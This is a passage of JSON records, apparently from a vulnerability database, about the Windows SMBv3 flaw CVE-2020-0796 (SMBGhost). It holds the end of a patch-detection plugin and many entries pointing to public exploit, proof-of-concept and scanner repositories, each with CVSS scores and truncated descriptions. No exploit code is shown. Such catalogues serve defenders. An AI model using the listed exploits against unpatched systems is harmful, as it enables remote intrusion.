share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18362\",\n rollup_date:\"03_2020_2\",\n bulletin:bulletin,\n rollup_kb_list:[4551762])\n ||\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18363\",\n rollup_date:\"03_2020_2\",\n bulletin:bulletin,\n rollup_kb_list:[4551762])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-08-18T04:22:57", "description": "# CVE-2020-0796 Remote overflow PO...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", 
"baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-28T05:23:20", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-09-28T05:37:37", "id": "243C313B-7F90-56EA-BE8E-35A8DFFAEDB2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-08T14:06:25", "description": "# CVE-2020-0796-SMB\n\u8be5\u8d44\u6e90\u4e3aCVE-2020-0796\u6f0f\u6d1e\u590d\u73b0\uff0c\u5305\u62ecPython\u7248\u672c\u548cC++\u7248\u672c\u3002\u4e3b\u8981\u662f\u96c6\u5408...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-02T12:12:03", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-06-08T03:05:02", "id": "A0F56F7F-FBEC-52A7-8D05-19E0EF3E860F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-11T13:52:54", "description": "# CVE-2020-0796\nWorking Exploit PoC (CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-04-22T09:09:02", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-03-11T09:59:14", "id": "7B8853FF-7CB4-5F4D-B185-FE434458F43D", "href": "", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:04:43", "description": "# CVE-2020-0796\n-----------\n\n# T\u1ed5ng quan:\nT\u00ednh n\u0103ng compression ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-10T02:35:34", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-12-25T09:08:30", "id": "1D1C90C4-5D8F-58C4-B5AA-805F46862E47", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T01:20:01", "description": "# SMBScanner\n Multithread SMB scanner to check CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-12T20:07:44", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2021-12-20T23:48:47", "id": "52AA3134-2731-589A-BE46-26ABB8039FE2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:58:14", "description": "# CVE-2020-0796-POC\n# \u53d7\u5f71\u54cd\u7cfb\u7edf\u7248\u672c\n\u6f0f\u6d1e\u4e0d\u5f71\u54cdwin7\uff0c\u6f0f\u6d1e\u5f71\u54cdWindows 10 1903\u4e4b\u540e\u7684\u5404\u4e2a...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-06T03:56:52", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-11-06T05:27:47", "id": "D6044381-6C6F-56BC-81B3-86E4B5FC5200", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-09T00:15:09", "description": "Usage:\n\nMake sure Python is installed, then run poc.py.\n\n\nWindow...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-20T09:00:08", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-02-08T17:19:05", "id": "D4A83665-CEF3-5877-9DA4-B03A23BF7461", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": 
"2021-12-10T14:45:35", "description": "# SMBv3 Ghost...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-06-09T06:18:54", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-06-10T12:36:18", "id": "0522E1EF-0AC6-5DD5-A6DA-6BF91F5A89C4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:04:00", "description": "# CVE-2020-0796\nlocal exploit\n\n\ni also got this from the interne...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-01-11T04:48:26", "type": "githubexploit", "title": 
"Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-06-10T10:41:17", "id": "1B787DF3-D66A-5A51-AB8B-DA600B216482", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T01:20:13", "description": "# SMBGhost\nAdvanced scanner for CVE-2020-0796 - SMBv3 RCE using ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-14T02:07:16", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2021-12-05T20:40:38", "id": "484522F4-99E8-5FCE-9CB6-2DB46070E529", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:10:15", "description": "# CVE-2020-0796\r\n\r\nWindows SMBv3 LPE Exploit\r\n\r\n Automate Exploitation and Detection\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-06-10T16:44:39", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-08-13T03:25:18", "id": "22C095F3-54B6-532B-AE10-73BEE3624D57", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:48:16", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": 
"HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-09T04:52:55", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2021-11-26T15:51:17", "id": "935331CB-5C0B-5059-BAC4-383651C26C94", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-25T13:39:58", "description": "# SMBGhost-LPE-Metasploit-Module\nThis is an implementation of th...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-06-19T20:38:11", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-07-25T13:36:10", "id": "FA0B4B9E-5D12-55F9-9E66-FA9CF9AF1B72", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:22:52", "description": "# SMBGhost\nSimple scanner for CVE-2020-0796 - SMBv3 RCE.\n\nThe sc...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-11T15:21:27", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-07-27T07:11:36", "id": 
"BDCD16BE-ECED-5F2A-994A-FBF6539639ED", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-20T15:44:33", "description": "# CVE-2020-0796-CNA\n\n\u6839\u636e[danigargu](https://github.com/danigargu/...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-06T15:16:10", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-07-20T07:40:59", "id": "709F50E2-7719-5BDB-ABBF-7CF8A820C46F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-03T05:33:54", "description": "This is Raphael's tinkering around with the SMBGhost LPE.\n\nI sta...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", 
"baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-17T01:48:37", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-08-02T23:44:07", "id": "2C47C88A-DA77-535C-9BCD-4A89D8B02384", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-01T05:55:15", "description": "# CVE-2020-0796\nWorking Exploit PoC (CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-22T09:10:15", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-05-31T15:25:40", "id": "23687103-A800-5907-929B-B3A41D121F1B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-29T11:37:50", "description": "# SMBGhost (CVE-2020-0796) and SMBleed (CVE-2020-1206) Scanner\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-07-06T14:45:07", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1206", "CVE-2020-0796"], "modified": "2021-12-29T11:15:53", "id": "D7ADE5F6-D414-5DF2-AEC2-92FB32E6041F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-04T15:04:24", 
